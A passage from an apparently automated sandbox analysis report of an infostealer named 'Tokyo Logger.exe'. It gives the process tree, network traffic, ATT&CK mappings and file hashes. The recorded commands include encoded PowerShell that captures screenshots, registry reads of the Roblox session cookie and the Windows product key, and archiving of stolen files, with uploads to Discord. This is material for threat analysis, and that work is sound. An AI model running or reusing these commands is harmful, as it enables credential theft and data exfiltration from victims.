H0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5040
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sa1tmpwk\sa1tmpwk.cmdline"
        5⤵
        
        PID:4052
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\sa1tmpwk\CSC64D800399C824A1C8F251AA158DFBC3D.TMP"
        6⤵
        
        PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4424
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1932
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1356
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1868
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2108
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5FJQT.zip" *"
    3⤵
    PID:5056
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5FJQT.zip" *
      4⤵
      Executes dropped EXE
      PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1140

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

76.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.32.126.40.in-addr.arpa

IN PTR

Response
DNS

blank-cmsdx.in

Tokyo Logger.exe

Remote address:

8.8.8.8:53

Request

blank-cmsdx.in

IN A

Response
DNS

ip-api.com

Tokyo Logger.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
GET

http://ip-api.com/line/?fields=hosting

Tokyo Logger.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0

Response

HTTP/1.1 200 OK

Date: Mon, 23 Dec 2024 22:37:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

gstatic.com

Tokyo Logger.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.74.227
DNS

227.74.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.74.250.142.in-addr.arpa

IN PTR

Response

227.74.250.142.in-addr.arpa

IN PTR

par10s40-in-f31e100net
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
GET

http://ip-api.com/json/?fields=225545

Tokyo Logger.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0

Response

HTTP/1.1 200 OK

Date: Mon, 23 Dec 2024 22:38:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

Tokyo Logger.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233
DNS

232.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.135.159.162.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

220.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.190.18.2.in-addr.arpa

IN PTR

Response

220.190.18.2.in-addr.arpa

IN PTR

a2-18-190-220deploystaticakamaitechnologiescom
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response

208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Tokyo Logger.exe

347 B
307 B
5
3

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
142.250.74.227:443

gstatic.com

tls

Tokyo Logger.exe

1.1kB
5.3kB
9
9
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Tokyo Logger.exe

548 B
512 B
7
4

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.135.232:443

discord.com

tls

Tokyo Logger.exe

11.9MB
178.2kB
8569
4181

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

76.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

76.32.126.40.in-addr.arpa
8.8.8.8:53

blank-cmsdx.in

dns

Tokyo Logger.exe

60 B
113 B
1
1

DNS Request

blank-cmsdx.in
8.8.8.8:53

ip-api.com

dns

Tokyo Logger.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

Tokyo Logger.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.74.227
8.8.8.8:53

227.74.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

227.74.250.142.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

discord.com

dns

Tokyo Logger.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.138.232

162.159.137.232

162.159.136.232

162.159.128.233
8.8.8.8:53

232.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.135.159.162.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

220.190.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

220.190.18.2.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_bz2.pyd

Filesize
48KB

MD5
6c57219d7f69eee439d7609ab9cc09e7

SHA1
52e8abbc41d34aa82388b54b20925ea2fcca2af8

SHA256
8e389c056a6cf8877ddf09a1ae53d1a1b1de71a32b437d992ec8195c3c8eda92

SHA512
801f5b3f15e25f3be3f7ece512ffa561c97d43fff465e8fcb8afc92a94fd0bd3ec57c3e4df775beb1a6357064fad2be2ab6345bb8fe8c9b00674ade546bf6bc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ctypes.pyd

Filesize
58KB

MD5
ee77573f4335614fc1dc05e8753d06d9

SHA1
9c78e7ce0b93af940749295ec6221f85c04d6b76

SHA256
20bc81c1b70f741375751ae7c4a177a409b141bfcd32b4267975c67fc1b11e87

SHA512
c87c9c68cb428c2305076545702e602c8119bb1c4b003fc077fc99a7b0f6ffd12cafdd7ff56dac5d150785adc920d92ea527067c8fec3c4a16737f11d23d4875

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_decimal.pyd

Filesize
106KB

MD5
787f57b9a9a4dbc0660041d5542f73e2

SHA1
219f2cdb825c7857b071d5f4397f2dbf59f65b32

SHA256
d5646447436daca3f6a755e188ea15932ae6b5ba8f70d9c1de78f757d310d300

SHA512
cd06ea22530c25d038f8d9e3cc54d1fdbc421fb7987ab6ebc5b665ae86a73b39a131daef351420f1b1cb522002388c4180c8f92d93ea15460ccba9029cac7eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_hashlib.pyd

Filesize
35KB

MD5
ff0042b6074efa09d687af4139b80cff

SHA1
e7483e6fa1aab9014b309028e2d31c9780d17f20

SHA256
e7ddac4d8f099bc5ebcb5f4a9de5def5be1fc62ecca614493e8866dc6c60b2ce

SHA512
0ff0178f7e681a7c138bfd32c1276cf2bd6fbeb734139b666f02a7f7c702a738abdbc9dddcf9ab991dead20ec3bf953a6c5436f8640e73bdd972c585937fa47a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_lzma.pyd

Filesize
86KB

MD5
58b19076c6dfb4db6aa71b45293f271c

SHA1
c178edc7e787e1b485d87d9c4a3ccfeadeb7039e

SHA256
eff1a7fc55efe2119b1f6d4cf19c1ec51026b23611f8f9144d3ef354b67ff4d5

SHA512
f4305dcc2024a0a138d997e87d29824c088f71322021f926e61e3136a66bea92f80bce06345307935072a3e973255f9bbae18a90c94b80823fbc9a3a11d2b2f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_queue.pyd

Filesize
25KB

MD5
e8f45b0a74ee548265566cbae85bfab8

SHA1
24492fcd4751c5d822029759dec1297ff31ae54a

SHA256
29e7801c52b5699d13a1d7b95fd173d4a45ab2791377ac1f3095d5edc8eba4bd

SHA512
5861a0606e2c2c2ebb3d010b4591e4f44e63b9dbfa59f8bb4ac1cda4fbfdcb969864601dee6b23d313fe8706819346cfbcd67373e372c7c23260b7277ee66fbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_socket.pyd

Filesize
43KB

MD5
6ef6bcbb28b66b312ab7c30b1b78f3f3

SHA1
ca053c79ce7ea4b0ec60eff9ac3e8dd8ba251539

SHA256
203daa59e7bf083176cbfcc614e3bac09da83d1d09ef4fcd151f32b96499d4b2

SHA512
bec35443715f98ee42fda3697c2009c66d79b1170714ea6dedde51205b64a845194fe3786702e04c593059ee4ad4bbfa776fbc130a3400a4a995172675b3dfa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
93b762fed6eabf7be765a190e2cec0ad

SHA1
05a80f2df21b73c859e133d78a93a0ae54a3aa95

SHA256
cb3f7b194d220004ffa6eef1305849bcef38033c49cb1b16c5ab3c3d60bd9d20

SHA512
99b493ffef75d55437a3b547c3f489c59ae8d3c3b96b171d932d06fe223b479422cea9cd6de54928bdbcc87f03434ea146337668e8fd68b1f292e77dfbcb8b93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
9c145aa4eb0f18ad768988612cb56d03

SHA1
e4f41a8e6e731df9a14ee2217612095ed7f3449a

SHA256
2161c0add0ee0a312e12d0346a1b24b6e5e1356a5a7e264911650a8e1d017e1c

SHA512
4e8aa7cc1996d75d5a85b3b5a4f2101650f3654bdd31e374257faa314f630553d497ca8347745945887bf3bf173463c167d310129d1bc1d0f9df8c0d8fc5a544

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
6f5c5015c4e74602f582c21f54cecbec

SHA1
499e6c2b6614f02b6eb347980822967f5ecf8d71

SHA256
cf7dc6f5abe58e31b41912b4a84cabd106eecf7cad7f5a1942c4befaca703536

SHA512
9d064c3dbe12386fac41bde379d378a81f77ed44ebd441089b42329438953a08d41eaf9d11d4f7e1df81aab29b87f70deefcf5d2e70f4ba4d487dab49eb3b3f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
a3d85e6ac7c84d25e288bead48197b9e

SHA1
9118b030e65e185d9310d4304f97baa01fd963eb

SHA256
41dd8451c6b25a7a924a7a42a3d466350bcd2820fca4177ef5f6305e6eadb97a

SHA512
e8df636bcdf42adabee1dc33dfdb9e17b9e9f126c0769fba0b4e6e11579908fa905144c3782f96259589ecdde5e929dd3d13f47fc3e3952fa713fb73285e6053

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
12096f3b3b8af96335897ff8226ff6a2

SHA1
361fcb192865ccaf0080053f21926143d3b51b8b

SHA256
70ea8113b1825f3529b307ce2edb1048ebc60c83c016892b6177f3c8cb56b9bc

SHA512
efc810b354e36e89c5af6244bb1415b13a4a02ee56a324f7e5de6bfa6516c6a85c319483ffc52a4042680da4295fbe6f77b9a6751b4fe29c68bdcbb780e1b9dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
de7b537e3ad4bbd23bc1aa1461da7893

SHA1
36b23a5889358108e9c5723aa2394da62975ca4c

SHA256
a198091842029a252e0112120b93bf7323b04ed647a3d2bd27fde72637385a7b

SHA512
cef2c7a73a9948538d27fd4724f66760bda2788f8f2e23d9437d9460452e9f898603d7a8d705f7b67ba96a5bedb4d11c8e9870f548bb169be8975453fdc10d5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
d54860bc805f73cd8e7e3fe05d544108

SHA1
b6184d9f4477e482801a0fa1f27b868533873d1d

SHA256
68e28b5944193ab45be2cc14e49424ba0c5d8713bb6b027e96ff1c16147f19a3

SHA512
22dffca161acdad3bcda6bc83ca63d4cedcbfd47b1b3549e98fc95d9b85ce2d49576f3ee3fc150da2e353731bf8d98e4eb3db80ba3913b32e783289905376a3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37922\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
51cdd94858eadfa992e3a397aae6a4ee

SHA1
6fe3a27f11c13fdd680802eb8c6f87a7a92518d6

SHA256
57cb180884f33b064957d9c1dd509bb5e8fd541e9458b84d88e025790c1dc986

SHA512
42702b377322fcd6e7090a01c262ce3a04a95154ff327a40841add210f678287658ad097e32bd53f23d88878cbe7625d868b7adfac042cdbc0f48e8e59b7504e

Download Submit
